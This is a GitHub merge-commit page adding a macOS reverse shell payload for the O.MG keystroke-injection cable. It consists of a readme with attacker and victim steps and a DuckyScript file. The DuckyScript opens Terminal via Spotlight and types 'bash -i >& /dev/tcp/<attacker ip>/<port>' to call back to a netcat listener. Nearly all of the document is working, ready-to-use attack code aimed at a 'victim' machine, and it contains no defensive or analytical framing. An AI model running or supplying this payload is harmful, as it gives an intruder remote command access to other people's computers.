Merge pull request #79 from skyejacobson/master

revshell_macos
pull/80/head
Darren Kitchen 2022-07-14 15:56:25 -05:00 committed by GitHub
commit 3eae81b7b0
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
2 changed files with 38 additions and 0 deletions

View File

@ -0,0 +1,18 @@
# This is, at heart, is a simple reverse shell to gain access to another MacOSX device. I'm looking into creating a tight shell that can run like a daemon but that is a wet dream atm.
# FIRST STEP(s):
# run this on the attackers machine
nc -l 'any port'
# This initializes your computers listening protocol to look for TCP connections
# IMPORTANT
# open another Terminal window and run to obtain your computers local ip (this is important for the next step)
ipconfig getifaddr en0
# NEXT STEP:
# Then simply run the script in your O.MG UI when the cable is connected
# An example of the code run on the attackers computer:
nc -l 80
# An example of the code run on the victims computer:
bash -i >& /dev/tcp/10.0.0.1/80 0>&1

View File

@ -0,0 +1,20 @@
REM Title: MacOSX Reverse Shell (v1.0)
REM Author: fatherthomas
REM Description: Allows you to traverse through any MacOS system and use bash commands to do what you please
REM Target: MacOS Monterey (or older versions)
REM Version: 1.0
GUI SPACE
DELAY 100
STRING Terminal
DELAY 200
ENTER
DELAY 900
STRING bash
DELAY 100
ENTER
DELAY 500
STRING bash -i >& /dev/tcp/<attacker ip>/<port> 0>&1
DELAY 200
ENTER
DELAY 1000